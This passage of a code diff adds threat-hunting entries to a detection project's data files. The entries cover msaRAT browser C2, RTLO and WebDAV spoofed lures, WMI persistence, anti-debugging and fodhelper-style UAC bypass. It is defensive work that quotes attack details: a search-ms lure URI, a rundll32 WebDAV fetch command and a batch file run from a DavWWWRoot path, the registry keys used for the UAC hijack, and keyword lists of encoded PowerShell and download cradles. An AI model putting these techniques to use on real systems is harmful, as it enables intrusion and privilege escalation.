     "why": "- **The request is legitimate; the volume and destination are not.** A webmail server making outbound web requests is normal, and the XSS payload runs inside a real authenticated session, so no single request is malicious — only the deviation from the server's/user's own egress envelope, and the novelty of the destination, separate theft from work. That per-entity anomaly framing is why this is an Alchemy hunt, not a Flame.\n- **Static thresholds lose both ways here.** The actor paced collection over a ~35-day dwell and the campaign's transport/volume were never published, so a fixed MB/day limit is both bypassed by slow exfil and noisy on federated mail servers; a per-entity baseline adapts to each server's normal and catches the relative spike.\n- **Destination novelty is the durable half of the signal.** The operators used domains dressed up as Zimbra analytics/metadata services; modeling the *rate of first-seen external destinations* from the mail tier catches the pattern even after the specific lookalike domains rotate — where an IOC block-list goes stale.\n- **The mail tier is a bright, well-scoped place to watch.** Webmail servers have a small, stable set of legitimate external destinations, so egress anomalies there carry far more signal than the same analytic run against general user browsing.",
     "references": "- [MITRE ATT&CK T1048.003: Exfiltration Over Alternative Protocol — Exfiltration Over Unencrypted Non-C2 Protocol](https://attack.mitre.org/techniques/T1048/003/)\n- [Unit 42 (Palo Alto Networks): Russian Global Webmail Espionage (CL-STA-1114 / Void Blizzard)](https://unit42.paloaltonetworks.com/russian-webmail-espionage/)\n- [CISA Advisory AA26-204A: Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Zimbra Collaboration Suite Users](https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-204a)\n- [ESET Research: Operation RoundPress — XSS Exploitation of Webmail Servers (Zimbra/Roundcube/Horde)](https://www.welivesecurity.com/en/eset-research/operation-roundpress/)\n- [Elastic Security Labs: Hunting for Data Exfiltration Over the Network](https://www.elastic.co/security-labs/network-exfiltration-detection)\n- [MITRE ATT&CK T1114.002: Email Collection — Remote Email Collection](https://attack.mitre.org/techniques/T1114/002/)",
     "file_path": "Alchemy/M029.md",
-    "created": null
+    "created": "2026-07-25T22:17:55-05:00"
   }
 ];

--- a/hunts-data.js
+++ b/hunts-data.js
@@ -8199,6 +8199,44 @@ const HUNTS_DATA = [
     "created": "2026-07-24T22:31:35-04:00"
   },
   {
+    "id": "H240",
+    "category": "Flames",
+    "title": "Chaos msaRAT headless browser C2 after MSI staging",
+    "tactic": "Execution, Stealth, Command and Control",
+    "notes": "Endpoint process telemetry - Core filter: `curl.exe` writing `C:\\ProgramData\\update_ms.msi` or `msiexec.exe` executing an MSI from `C:\\ProgramData`. Triage values: `process command line`, `parent process command line`, `file path`, `user`, `host`. Pivot: look for `msiexec.exe` custom action behavior and follow-on DLL load from the same installer window. Strong red flags: plain `http://` transfer on port `443`, `update_ms.msi`, and staging outside a managed software deployment path.\n\nModule and browser launch telemetry - Core filter: MSI execution followed by `lib.dll` load and Chrome or Edge launched by a non-browser parent. Triage values: `loaded module path`, `process command line`, `parent process name`, `parent process command line`. Pivot: search for browser flags such as `--headless`, `--remote-debugging-port`, `--remote-debugging-address`, and Chrome or Edge started from an unusual parent after the MSI runs. Strong red flags: a newly launched headless browser with a local debugging port immediately after `msiexec.exe` activity.\n\nLocal browser control telemetry - Core filter: a non-browser process connecting to `127.0.0.1` on the browser debugging port, then issuing CDP style paths or WebSocket control. Triage values: `source process`, `destination IP address`, `destination port`, `process command line`, `user`. Pivot: correlate local debugging connections with browser-owned requests to `/json/list/`, `Target.createTarget`, `Page.setBypassCSP`, `Runtime.addBinding`, or `Runtime.evaluate`. Strong red flags: callbacks or binding names such as `msaOpen`, `msaClose`, `msaError`, `msaMessage`, or `dataAck`.\n\nProcess-owned network telemetry - Core filter: headless Chrome or Edge making external signaling and WebRTC traffic shortly after local RAT execution. Triage values: `process name`, `process command line`, `destination domain`, `destination IP address`, `user agent`, `parent process name`. Correlation: browser traffic to `workers.dev` style signaling, `HeadlessChrome` user agent, then TURN relay traffic such as `global.turn.twilio.com` after a local debugging session. False positive: browser automation and QA systems can use remote debugging, but they should not follow `curl.exe` MSI staging, `lib.dll` load, and local malware-to-browser control on an end-user host.\n",
+    "tags": [
+      "chaos_ransomware",
+      "msarat",
+      "chrome_devtools_protocol",
+      "webrtc",
+      "msi",
+      "headless_browser",
+      "T1105",
+      "T1218.007",
+      "T1059.003",
+      "T1090",
+      "T1071.001"
+    ],
+    "techniques": [
+      "T1105",
+      "T1218.007",
+      "T1059.003",
+      "T1090",
+      "T1071.001"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Joshua Strickland",
+      "link": "https://novasky.io"
+    },
+    "why": "- Talos tied this behavior to active Chaos ransomware operations and named concrete artifacts: `update_ms.msi`, `C:\\ProgramData\\update_ms.msi`, `lib.dll`, and CDP binding names such as `msaOpen` and `msaMessage`.\n- The hunt survives IP and domain rotation because the RAT still has to stage an MSI, load the embedded DLL, start a headless browser, and control it through a local debugging channel.\n- MDR teams can observe the chain with standard endpoint telemetry: process creation, file creation, module loads, browser command lines, localhost connections, and process-owned network metadata.\n- False positives are controllable because benign browser automation is not expected to appear immediately after `curl.exe` writes an MSI into `ProgramData` and `msiexec.exe` loads a payload DLL.",
+    "references": "- [Cisco Talos: Chaos ransomware msaRAT browser C2](https://blog.talosintelligence.com/chaos-msarat-living-off-the-browser-to-build-covert-c2-channel/)\n- [MITRE ATT&CK T1105 Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)\n- [MITRE ATT&CK T1218.007 Msiexec](https://attack.mitre.org/techniques/T1218/007/)\n- [MITRE ATT&CK T1090 Proxy](https://attack.mitre.org/techniques/T1090/)\n- [MITRE ATT&CK T1071.001 Web Protocols](https://attack.mitre.org/techniques/T1071/001/)",
+    "file_path": "Flames/H240.md",
+    "created": "2026-07-25T22:17:55-05:00"
+  },
+  {
     "id": "H241",
     "category": "Flames",
     "title": "WMI permanent event subscription persistence executing a script interpreter or LOLBin",
@@ -8334,7 +8372,7 @@ const HUNTS_DATA = [
     "why": "- **The spoof is the whole point of the click.** Users are trained to trust `.pdf`; the double extension + RTLO makes a `.scr`/`.lnk` read as a document in Explorer and the search-ms window, so catching the filename shape catches the technique before execution, not after.\n- **WebDAV delivery leaves a narrow, low-base-rate trail.** `rundll32.exe` loading `davclnt.dll,DavSetCookie` to a first-seen external host, and the WebClient service starting on a machine that never uses WebDAV, are sharp signals once sanctioned DAV endpoints are baselined out.\n- **The artifact survives infrastructure rotation.** RTLO bytes, homoglyphs, and a hidden true-executable extension are properties of the lure itself — they persist even when the operator changes C2 IPs, so a filename-shape hunt is durable where an IOC block-list is not.\n- **It sits at initial access, upstream of everything expensive.** The same lab's chains end in PureRAT with process injection, UAC bypass, and persistence; interdicting the spoofed-file delivery denies the operator every later stage in one place.",
     "references": "- [MITRE ATT&CK T1036.007: Masquerading — Double File Extension](https://attack.mitre.org/techniques/T1036/007/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Micah Babinski: Search-ms, WebDAV, and Chill — Detecting a [Re-]emerging Initial Access Technique](https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462)\n- [dfir.ch: Abusing the \"search-ms\" URI Protocol Handler](https://dfir.ch/posts/search-ms_protocol_handler/)\n- [SigmaHQ / Detection.FYI: Suspicious WebDav Client Execution Via Rundll32.EXE](https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution/)\n- [Splunk Security Content: Windows Rundll32 WebDav With Network Connection](https://research.splunk.com/endpoint/f03355e0-28b5-4e9b-815a-6adffc63b38c/)\n- [MITRE ATT&CK T1036.002: Masquerading — Right-to-Left Override](https://attack.mitre.org/techniques/T1036/002/)",
     "file_path": "Flames/H244.md",
-    "created": null
+    "created": "2026-07-25T22:17:55-05:00"
   },
   {
     "id": "M001",

--- a/public/hunts-data.json
+++ b/public/hunts-data.json
@@ -950,6 +950,40 @@
     "created": "2026-07-18T14:13:05-05:00"
   },
   {
+    "id": "B032",
+    "category": "Embers",
+    "title": "Baseline all permanent WMI event subscriptions to surface rogue CommandLine/ActiveScript consumers",
+    "tactic": "Persistence, Privilege Escalation",
+    "notes": "PLATFORM: Windows. BASELINE FIRST (Embers). TRIGGER SOURCE: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery Lab\" (2026-07-20), which listed WMI event subscription as a persistence mechanism in the delivery kit. This baseline is the prerequisite that makes the paired Flame (H241, T1546.003) able to call a subscription \"unexpected.\"\n\nDATA COLLECTION FIELDS (per subscription object): hostname; __EventFilter name + WQL query text (trigger class, e.g. Win32_PerfFormattedData uptime / __InstanceModificationEvent logon / timer); consumer type (CommandLineEventConsumer vs ActiveScriptEventConsumer vs the benign LogFile/NTEventLog types); consumer name; consumer ACTION (CommandLineTemplate / ExecutablePath, or ScriptText/ScriptingEngine); __FilterToConsumerBinding linkage; creating process image + signer + user (from Sysmon EID 1 near the EID 19/20/21 timestamps); creation timestamp; SYSTEM vs user context. TELEMETRY: Sysmon EID 19/20/21, WMI-Activity operational log EIDs 5859-5861, and host inventory via osquery (wmi_event_filters, wmi_consumers, wmi_filter_consumer_bindings) or Get-WmiObject -Namespace root\\subscription.\n\nCOLLECTION WINDOW: 30 days to capture reboot/logon/patch-cycle triggers, plus a one-time full repository sweep of all existing subscriptions (persistence may predate the collection window). DELIVERABLE: a per-environment allowlist of vetted subscriptions keyed on {consumer type, normalized consumer action, creating signer}, plus an inventory of every host carrying a CommandLine/ActiveScript consumer — the triage worklist.\n\nIMMEDIATE FLAGS (do not wait for the baseline to finish): (1) a CommandLineEventConsumer whose action runs powershell/cmd/mshta/wscript/cscript/rundll32, contains `-enc`/`-EncodedCommand`/`DownloadString`/`IEX`, or points at %TEMP%/%APPDATA%/ProgramData or another user-writable path; (2) an ActiveScriptEventConsumer with embedded VBScript/JScript; (3) filter + consumer + binding (EID 19+20+21) all created within the same second by a non-management process; (4) any consumer created by an unsigned or first-seen creator process. CROSS-REF: enables H241 (T1546.003 WMI subscription persistence executing an interpreter/LOLBin); relates to T1047 (WMI) and T1059.001/.005 (the PowerShell/VBScript a malicious consumer runs).",
+    "tags": [
+      "persistence",
+      "privilege_escalation",
+      "windows",
+      "wmi",
+      "event_subscription",
+      "baseline",
+      "fileless",
+      "commandlineeventconsumer",
+      "t1546_003",
+      "t1047",
+      "T1546.003"
+    ],
+    "techniques": [
+      "T1546.003"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **Malicious WMI persistence hides among legitimate management subscriptions, not among noise.** The few products that create permanent subscriptions look structurally similar to an attacker's, so only a vetted allowlist of *which* consumers legitimately exist — keyed on the consumer action and its creating signer — makes a rogue one stand out. That is why this is an Ember, not a Flame.\n- **The repository must be swept, not just watched.** Persistence installed before monitoring began lives silently in the CIM database with no ongoing event; a one-time enumeration of `root\\subscription` across the estate is the only way to find pre-existing implants, which a purely streaming rule never sees.\n- **The volume is low enough to inventory completely.** Permanent subscriptions are rare, so unlike most baselines this one can aim for full coverage — every filter, consumer, and binding — turning the baseline itself into a durable asset inventory.\n- **It is the prerequisite for the persistence Flame.** H241 can only call a consumer \"unexpected\" against this allowlist; without the baseline, every SCCM or monitoring subscription is a false positive and the Flame is unusable.",
+    "references": "- [MITRE ATT&CK T1546.003: Event Triggered Execution — Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1546/003/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [TrustedSec: Sysmon Community Guide — WMI Events (19/20/21)](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/WMI-events.md)\n- [in.security: An Intro into Abusing and Identifying WMI Event Subscriptions for Persistence](https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/)\n- [osquery schema: wmi_event_filters / wmi_consumers / wmi_filter_consumer_bindings](https://osquery.io/schema/current)\n- [Splunk Security Content: WMI Permanent Event Subscription — Sysmon](https://research.splunk.com/endpoint/ad05aae6-3b2a-4f73-af97-57bd26cee3b9/)",
+    "file_path": "Embers/B032.md",
+    "created": null
+  },
+  {
     "id": "H001",
     "category": "Flames",
     "title": "An adversary is attempting to brute force the admin account on the externally facing VPN gateway.",
@@ -8164,6 +8198,144 @@
     "created": "2026-07-24T22:31:35-04:00"
   },
   {
+    "id": "H240",
+    "category": "Flames",
+    "title": "Double-extension / RTLO-spoofed payloads delivered from a WebDAV share via search-ms",
+    "tactic": "Defense Evasion",
+    "notes": "PLATFORM: Windows. Source: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery\nLab\" (2026-07-20), which recovered an operator's staging server full of bulk-generated lures. Final payload in\nboth observed chains was PureRAT 4.4.3 (build tag 06x12x2026SantaEbash2).\n\nATTACK MECHANICS (from the report): a JavaScript-triggered search-ms URI opens a WebDAV share filtered to a single\nextension — e.g. `search-ms:displayname=Search Results in \\\\onedrive.cv@80\\Downloads\\CURP&query=*.scr` — so the\nvictim sees what looks like a local search result. The lures follow a systematic naming scheme\n`HyperPackSetup.<method>.<trick>.<spoof>.lnk`, and the primary document lure was `ReportFinal.rcs.pdf`, an\nRTLO-masqueraded .scr. The report explicitly lists three spoofing tricks stacked together: RTLO (U+202E), double\nextensions, and whitespace padding before .exe / .scr. Sibling delivery vectors in the same kit: UNC paths,\nlibrary-ms, Control Panel items, and LOLBin proxies (iediagcmd.exe, CustomShellHost.exe, OfficeC2RClient.exe).\n\nDETECTION SIGNALS (Windows):\n- Sysmon EID 11 (File Create) for files landing in Downloads/%TEMP% whose name contains U+202E, homoglyph\n  characters in the extension, or a double extension where the TRUE trailing extension is .lnk/.scr/.exe/.js.\n- WebClient service starting (svchost -k WebClientGroup / System 7036 \"WebClient → Running\") on a host that does\n  not normally mount WebDAV, immediately followed by:\n- Sysmon EID 1: `rundll32.exe C:\\Windows\\system32\\davclnt.dll,DavSetCookie <host>@<port> http://<host>:<port>/`\n  (SysWOW64 variant too) — the WebDAV client fetching content — with Sysmon EID 3 to a first-seen/external host.\n- Process lineage: explorer.exe → the spoofed .lnk/.scr, or cmd.exe `/c \\\\<host>@SSL\\DavWWWRoot\\new.bat`, or a\n  decoy .pdf opened from the same DavWWWRoot path while the real payload executes.\n- Parse recovered .lnk with LECmd: RelativePath / WorkingDir pointing at `\\\\<host>@<port>\\DavWWWRoot\\files`.\n\nCROSS-REF: pair with T1036.002 (Right-to-Left Override — the RTLO half of the same spoof), T1204.002 (Malicious\nFile — the user double-click this hunt depends on), and T1055 (the report's PureRAT injects into a signed Qihoo\n360 process after landing). H243 (T1548.002 UAC bypass) and the WMI-persistence hunts (H241/B032) cover the\npost-execution stages of the same intrusion set.\n",
+    "tags": [
+      "defense_evasion",
+      "windows",
+      "masquerading",
+      "double_extension",
+      "rtlo",
+      "webdav",
+      "search_ms",
+      "initial_access",
+      "purerat",
+      "t1036_007",
+      "t1036_002",
+      "t1204_002",
+      "T1036.007"
+    ],
+    "techniques": [
+      "T1036.007"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **The spoof is the whole point of the click.** Users are trained to trust `.pdf`; the double extension + RTLO makes a `.scr`/`.lnk` read as a document in Explorer and the search-ms window, so catching the filename shape catches the technique before execution, not after.\n- **WebDAV delivery leaves a narrow, low-base-rate trail.** `rundll32.exe` loading `davclnt.dll,DavSetCookie` to a first-seen external host, and the WebClient service starting on a machine that never uses WebDAV, are sharp signals once sanctioned DAV endpoints are baselined out.\n- **The artifact survives infrastructure rotation.** RTLO bytes, homoglyphs, and a hidden true-executable extension are properties of the lure itself — they persist even when the operator changes C2 IPs, so a filename-shape hunt is durable where an IOC block-list is not.\n- **It sits at initial access, upstream of everything expensive.** The same lab's chains end in PureRAT with process injection, UAC bypass, and persistence; interdicting the spoofed-file delivery denies the operator every later stage in one place.",
+    "references": "- [MITRE ATT&CK T1036.007: Masquerading — Double File Extension](https://attack.mitre.org/techniques/T1036/007/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Micah Babinski: Search-ms, WebDAV, and Chill — Detecting a [Re-]emerging Initial Access Technique](https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462)\n- [dfir.ch: Abusing the \"search-ms\" URI Protocol Handler](https://dfir.ch/posts/search-ms_protocol_handler/)\n- [SigmaHQ / Detection.FYI: Suspicious WebDav Client Execution Via Rundll32.EXE](https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution/)\n- [Splunk Security Content: Windows Rundll32 WebDav With Network Connection](https://research.splunk.com/endpoint/f03355e0-28b5-4e9b-815a-6adffc63b38c/)\n- [MITRE ATT&CK T1036.002: Masquerading — Right-to-Left Override](https://attack.mitre.org/techniques/T1036/002/)",
+    "file_path": "Flames/H240.md",
+    "created": null
+  },
+  {
+    "id": "H241",
+    "category": "Flames",
+    "title": "WMI permanent event subscription persistence executing a script interpreter or LOLBin",
+    "tactic": "Persistence, Privilege Escalation",
+    "notes": "PLATFORM: Windows. TRIGGER SOURCE: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware\nDelivery Lab\" (2026-07-20), which flagged WMI event subscription as a persistence mechanism in the delivery kit\n(alongside scheduled tasks `brokerhost`/`net_queue_32` and a Run key). HEARTH had no coverage for T1546.003; this\nhunt generalizes the technique with the well-established WMI persistence detection stack.\n\nATTACK MECHANICS: persistence lives in the WMI/CIM repository, not on disk. Three objects are required and Sysmon\nlogs each: __EventFilter (EID 19 — inspect the WQL, e.g. a trigger on `Win32_PerfFormattedData_PerfOS_System`\nuptime 200-320s or on logon), an EventConsumer (EID 20 — the two abused types are CommandLineEventConsumer, which\nruns a command, and ActiveScriptEventConsumer, which runs embedded VBScript/JScript), and a\n__FilterToConsumerBinding (EID 21). Execution is brokered by trusted WmiPrvSE.exe (and scrcons.exe for script\nconsumers), typically inheriting SYSTEM.\n\nDETECTION SIGNALS (Windows):\n- Temporal correlation: Sysmon EID 19 + 20 + 21 created within the same second/minute = a subscription deployed.\n- EID 20 CommandLineEventConsumer/ActiveScriptEventConsumer whose action contains powershell/cmd/mshta/wscript,\n  `-enc`/`-EncodedCommand`, DownloadString/IEX, or a path under %TEMP%/%APPDATA%/ProgramData.\n- WMI-Activity operational log EIDs 5859-5861 as a corroborating/second source where Sysmon isn't deployed.\n- Sysmon EID 7: WmiPrvSE.exe loading wbemcons.dll (CommandLineEventConsumer runtime), or EID 1: scrcons.exe /\n  WmiPrvSE.exe spawning an interpreter under SYSTEM with an anomalous parent.\n- Host inventory via osquery tables wmi_event_filters / wmi_consumers / wmi_filter_consumer_bindings.\n\nCROSS-REF: pair with B032 (baseline of legitimate permanent WMI subscriptions) — you cannot call a consumer\n\"unexpected\" without that allowlist, so B032 is the prerequisite for this Flame. Also cross-ref T1047 (WMI) for\nthe broader abuse of the WMI service, and T1059.001/.005 for the PowerShell/VBScript the consumer executes.\n",
+    "tags": [
+      "persistence",
+      "privilege_escalation",
+      "windows",
+      "wmi",
+      "event_subscription",
+      "fileless",
+      "commandlineeventconsumer",
+      "activescripteventconsumer",
+      "t1546_003",
+      "t1047",
+      "T1546.003"
+    ],
+    "techniques": [
+      "T1546.003"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **Fileless and SYSTEM-context by design.** The persistence lives in the CIM repository, not the filesystem, and executes through a trusted broker, so disk-based and signature detections miss it — creation telemetry (Sysmon 19/20/21) is the reliable catch point.\n- **The telemetry is nearly noise-free.** Permanent WMI subscriptions are rare outside a handful of management tools, so a log-all approach with a small allowlist yields high-fidelity alerts rather than a flood.\n- **Temporal correlation is a strong, durable signal.** Filter + consumer + binding created within the same second is a structural fingerprint of the technique that survives payload and infrastructure changes.\n- **It pairs with a concrete baseline.** The one false-positive source — legitimate management subscriptions — is exactly what B032 inventories, so the two hunts together turn \"any subscription\" into \"any subscription not on the allowlist.\"",
+    "references": "- [MITRE ATT&CK T1546.003: Event Triggered Execution — Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1546/003/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [SigmaHQ: WMI Event Subscription (sysmon_wmi_event_subscription.yml)](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml)\n- [Splunk Security Content: Detect WMI Event Subscription Persistence](https://research.splunk.com/endpoint/01d9a0c2-cece-11eb-ab46-acde48001122/)\n- [TrustedSec: Sysmon Community Guide — WMI Events (19/20/21)](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/WMI-events.md)\n- [Detect.FYI: Hunting WMI Event Subscription Persistence](https://detect.fyi/hunting-wmi-event-subscription-persistence-f087900029f4)",
+    "file_path": "Flames/H241.md",
+    "created": null
+  },
+  {
+    "id": "H242",
+    "category": "Flames",
+    "title": "Malware self-debugging and debug-register / debugger-process checks to block analysis (I2PRAT, PikaBot)",
+    "tactic": "Defense Evasion",
+    "notes": "PLATFORM: Windows. Sources: Sekoia TDR, \"RATatouille: Cooking Up Chaos in the I2P Kitchen\" (I2PRAT) and Sekoia\nTDR, \"PikaBot: a Guide to its Deep Secrets and Operations.\" Both malware families gate execution on\nanti-analysis, and both surfaced T1622 as an uncovered gap.\n\nATTACK MECHANICS — two complementary approaches observed:\n1. I2PRAT self-debugging: the loader creates a debug object and attaches to its own newly spawned installer\n   process so a debugger cannot attach, using NtCreateDebugObject, NtDebugActiveProcess, NtWaitForDebugEvent,\n   NtDebugContinue, and waiting on DbgCreateProcessStateChange to keep the child pending. It also duplicates an\n   elevated SYSTEM process handle (NtDuplicateObject, PROCESS_ALL_ACCESS) and spawns a child with\n   PROCESS_CREATE_FLAGS_INHERIT_HANDLES, spoofing the parent PID as a child of winlogon.exe, then injects via\n   thread execution hijacking (observed \"duplicates itself from process ID 6028 to 8912\").\n2. PikaBot active checks: reads debug registers through the thread context via GetThreadContext (\"non-zero values\n   in any of these registers may indicate a debugger\"), carries CheckRemoteDebuggerPresent and a debug_flag in\n   its stage-2 struct, and enumerates processes with CreateToolhelp32Snapshot / Process32First / Process32Next\n   against an RC4-encrypted ban list (x32dbg.exe, x64dbg.exe, windbg.exe, ImmunityDebugger.exe, idaq/idaq64.exe,\n   Fiddler.exe, \"Wireswhar.exe\", dumpcap.exe, ProcessHacker.exe, procmon.exe, tcpview.exe, cheatengine variants),\n   terminating on a match. Since Feb 2024 it uses direct syscalls (SysWhispers2) including ZwSystemDebugControl /\n   NtSystemDebugControl to bypass ntdll userland hooks. (Related: Rapid7's PureRAT WebDAV payload calls\n   IsDebuggerPresent and FailFast if monitored, and checks COR_PROFILER — the same defensive gate.)\n\nDETECTION SIGNALS (Windows):\n- Sysmon EID 10 (ProcessAccess): SourceImage (unsigned/new) opening a TargetImage it just created with access\n  masks granting debug/duplicate rights; or self-open. GrantedAccess like 0x1FFFFF (PROCESS_ALL_ACCESS).\n- Sysmon EID 1: a child created SUSPENDED whose ParentImage is spoofed (winlogon.exe) but whose real creator is a\n  loader in %TEMP%/%APPDATA%; correlate CreationTime vs the debug-object access.\n- ETW-TI (if surfaced by the EDR): NtCreateDebugObject/NtDebugActiveProcess against an own child, NtSetContextThread\n  + NtResumeThread (thread hijack), ZwSystemDebugControl from a non-debugger.\n- Behavioral bundle: banned-analyst-process enumeration (Toolhelp snapshot) immediately followed by self-exit, or\n  debug checks immediately followed by CreateRemoteThread/process tampering (EID 8/25).\n\nCROSS-REF: T1497.001 (System Checks — the banned-process/sandbox enumeration is the sibling anti-analysis gate);\nT1055.003/.012 (thread execution hijacking / process hollowing that these loaders run once the anti-debug gate\npasses); T1106 (Native API — the Nt*/Zw* direct-syscall usage that carries the checks).\n",
+    "tags": [
+      "defense_evasion",
+      "windows",
+      "debugger_evasion",
+      "anti_analysis",
+      "anti_debugging",
+      "i2prat",
+      "pikabot",
+      "process_injection",
+      "t1622",
+      "t1497_001",
+      "T1622"
+    ],
+    "techniques": [
+      "T1622"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **The check runs before the payload, so catching it interdicts everything downstream.** Both loaders decide whether to detonate based on the anti-debug gate; the injection, C2, and persistence only happen if the gate passes — so the anti-analysis behavior is the earliest reliable catch point.\n- **Self-debugging is anomalous by construction.** A short-lived, unsigned process creating a debug object and attaching to a child it just spawned (with a spoofed `winlogon.exe` parent) is not something benign software does — it is the technique's fingerprint, independent of the C2 or payload.\n- **The banned-process scan is a distinctive tell.** A `CreateToolhelp32Snapshot` walk that matches on `x64dbg`/`windbg`/`procmon`/`wireshark` and is immediately followed by self-termination is a behavioral signature that survives sample changes.\n- **Direct syscalls signal deliberate evasion.** `ZwSystemDebugControl`/`NtSetContextThread` issued via SysWhispers-style direct syscalls (bypassing ntdll hooks) from a non-debugger is itself suspicious and, where ETW-TI is available, directly observable.",
+    "references": "- [MITRE ATT&CK T1622: Debugger Evasion](https://attack.mitre.org/techniques/T1622/)\n- [Sekoia TDR: RATatouille — Cooking Up Chaos in the I2P Kitchen (I2PRAT)](https://www.sekoia.com/blog/ratatouille-cooking-up-chaos-in-the-i2p-kitchen)\n- [Sekoia TDR: PikaBot — a Guide to its Deep Secrets and Operations](https://www.sekoia.com/blog/pikabot-a-guide-to-its-deep-secrets-and-operations)\n- [Check Point Anti-Debug Reference: Debug Objects & Debugger Detection](https://anti-debug.checkpoint.com/)\n- [Unprotect Project: Anti-Debugging Techniques](https://unprotect.it/category/anti-debugging/)\n- [MITRE ATT&CK T1497.001: Virtualization/Sandbox Evasion — System Checks](https://attack.mitre.org/techniques/T1497/001/)",
+    "file_path": "Flames/H242.md",
+    "created": null
+  },
+  {
+    "id": "H243",
+    "category": "Flames",
+    "title": "UAC bypass via auto-elevating binary and HKCU shell-open-command hijack (fodhelper / computerdefaults / wsreset)",
+    "tactic": "Privilege Escalation, Defense Evasion",
+    "notes": "PLATFORM: Windows. SOURCE: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery\nLab\" (2026-07-20). The recovered kit's Tier-5 test set included `I49_fodhelper.url`, `I50_computerdefaults.url`,\nand `I52_wsreset.url`, and the DlrtyGames chain performed COM auto-elevation through dllhost.exe; the final\npayload was PureRAT 4.4.3. HEARTH had no T1548.002 coverage.\n\nATTACK MECHANICS: UAC bypass here is logic abuse, not memory corruption. Auto-elevating Microsoft binaries\n(marked autoElevate=true) launch to high integrity without a prompt and then open a handler resolved via the\nregistry. fodhelper/computerdefaults look up `HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command`; because HKCU\nis checked before HKCR and is user-writable, a medium-integrity process pre-populates that key (often with a\n`DelegateExecute` value) so the elevated binary runs the attacker's command as high integrity. Sibling keys:\n`HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` (eventvwr), `HKCU\\Software\\Classes\\Folder\\shell\\open\\command`\nand `exefile\\shell\\runas\\command\\IsolatedCommand` (sdclt), `HKCU\\Environment` windir hijack (SilentCleanup).\n\nDETECTION SIGNALS (Windows):\n- Sysmon EID 13: value set on `HKCU\\Software\\Classes\\{ms-settings|mscfile|Folder}\\...\\shell\\open\\command` or a\n  `DelegateExecute` value — capture in real time, since operators often delete the key immediately after (a\n  point-in-time registry scan misses it). SwiftOnSecurity Sysmon config covers these paths by default.\n- Sysmon EID 1 / 4688: fodhelper.exe / computerdefaults.exe / eventvwr.exe / sdclt.exe / wsreset.exe (or\n  dllhost.exe COM surrogate) spawning cmd/powershell/mshta/rundll32 or an unsigned binary — a Medium→High\n  integrity transition with NO preceding consent.exe. \"A legitimate fodhelper.exe should never spawn a shell.\"\n- Correlation rule: any HKCU\\Software\\Classes\\...\\command write within ~5 min BEFORE an auto-elevating binary\n  launches. Then trace the high-integrity session for LSASS access, service install (7045), or encoded PowerShell.\n- Evasion watch: Sysmon EID 12/14 registry symbolic-link creation with value name `SymbolicLinkValue` (UACME\n  >=3.5 uses a symlink+rename to dodge shell-open-command monitoring).\n\nCROSS-REF: T1112 (Modify Registry — the HKCU hijack is the registry-write half); T1055 (the PureRAT payload this\nbypass elevates then injects); the same Rapid7 lab drives H240 (T1036.007 delivery) and H241/B032 (WMI\npersistence) — different stages of one intrusion.\n",
+    "tags": [
+      "privilege_escalation",
+      "defense_evasion",
+      "windows",
+      "uac_bypass",
+      "fodhelper",
+      "computerdefaults",
+      "registry_hijack",
+      "purerat",
+      "t1548_002",
+      "t1112",
+      "T1548.002"
+    ],
+    "techniques": [
+      "T1548.002"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
